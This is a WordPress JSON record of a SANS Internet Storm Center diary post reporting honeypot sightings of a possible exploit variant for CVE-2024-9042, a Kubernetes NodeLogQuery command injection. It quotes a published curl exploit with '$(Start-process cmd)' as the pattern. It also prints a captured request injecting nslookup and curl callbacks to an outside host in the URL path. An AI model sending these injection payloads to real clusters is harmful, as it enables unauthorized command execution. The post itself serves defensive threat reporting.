{"id":9098,"date":"2025-12-11T04:03:41","date_gmt":"2025-12-11T04:03:41","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/12\/11\/32554\/"},"modified":"2025-12-11T04:03:41","modified_gmt":"2025-12-11T04:03:41","slug":"32554","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/12\/11\/32554\/","title":{"rendered":"Possible exploit variant for CVE-2024-9042 (Kubernetes OS Command Injection), (Wed, Dec 10th)"},"content":{"rendered":"<p>    Possible exploit variant for CVE-2024-9042 (Kubernetes OS Command Injection), (Wed, Dec 10th)<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Last year, Kubernetes fixed a command injection vulnerability in the Kubernetes NodeLogQuery feature (%%cve:2024-9042%%) [1]. To exploit the vulnerability, several conditions had to be met:<\/p>\n<ul>\n<li>The vulnerable node had to run Windows<\/li>\n<li>The attacker had to have permissions to read logs<\/li>\n<li>The NogeLogQuery feature had to be enabled (at least at the time, it was in &#8220;Beta&#8221; and not enabled by default)<\/li>\n<\/ul>\n<p>The sample exploits posted at the time passed the OS command as a GET parameter. For example [2]<\/p>\n<blockquote>\n<p><tt>curl \u00a0\"&lt;Kubernetes API Proxy server IP&gt;\/api\/v1\/nodes\/&lt;NODE name&gt;\/proxy\/logs\/?query=nssm&amp;pattern=\u2019$(Start-process cmd)\u2019\"<\/tt><\/p>\n<\/blockquote>\n<p>The exploit uses\u00a0&#8216;$(oscommand)&#8217; as a &#8220;pattern&#8221;, and sends a query to the &#8220;\/logs\/&#8221; endpoint. Overall, a classic OS command injection issue.<\/p>\n<p>Starting a couple of days ago, I spotted some requests sent to our honeypots that followed a similar pattern. It isn&#8217;t clear to me if this is essentially the same vulnerability or something completely different. The exploit used the &#8220;logs&#8221; endpoint and achieves command injection via the &#8220;$(oscommand)&#8221; pattern, but this time around it includes the command as part of the path. There is a chance that something like this will work, as path elements are often used by APIs.<\/p>\n<p>Google suggests CVE-2024-9042, but this may be something completely different. Please let me know if you have any ideas. Here is a sample request as captured by a honeypot:<\/p>\n<blockquote>\n<p><tt>GET \/$(nslookup%20-q=cname%20[redacted].bxss.me||curl%20[redacted].bxss.me)\/logs\/<br \/>\naccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<br \/>\naccept-encoding: gzip,deflate<br \/>\nuser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36<br \/>\nhost: [redacted]<br \/>\nconnection: Keep-alive<\/tt><\/p>\n<\/blockquote>\n<p>\u00a0<\/p>\n<p>[1]\u00a0https:\/\/www.openwall.com\/lists\/oss-security\/2025\/01\/16\/1<br \/>\n[2]\u00a0https:\/\/www.akamai.com\/blog\/security-research\/kubernetes-log-query-rce-windows<\/p>\n<p>&#8212;<br \/>\nJohannes B. Ullrich, Ph.D. , Dean of Research, <a href=\"https:\/\/sans.edu\/\">SANS.edu<\/a><br \/>\n<a href=\"https:\/\/jbu.me\/164\">Twitter<\/a>|<\/p>\n<p> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><\/p>\n<p> \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/isc.sans.edu\/diary\/rss\/32554\">Go to isc.sans.edu<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Possible exploit variant for CVE-2024-9042 (Kubernetes OS Command Injection), (Wed, Dec 10th) Last year, Kubernetes fixed a command injection vulnerability in the Kubernetes NodeLogQuery feature (%%cve:2024-9042%%) [1]. To exploit the vulnerability, several conditions had to be met: The vulnerable node had to run Windows The attacker had to have permissions to read logs The NogeLogQuery [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[56],"tags":[69],"class_list":["post-9098","post","type-post","status-publish","format-standard","hentry","category-isc-sans-edu","tag-isc-sans-edu"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/9098"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=9098"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/9098\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=9098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=9098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=9098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}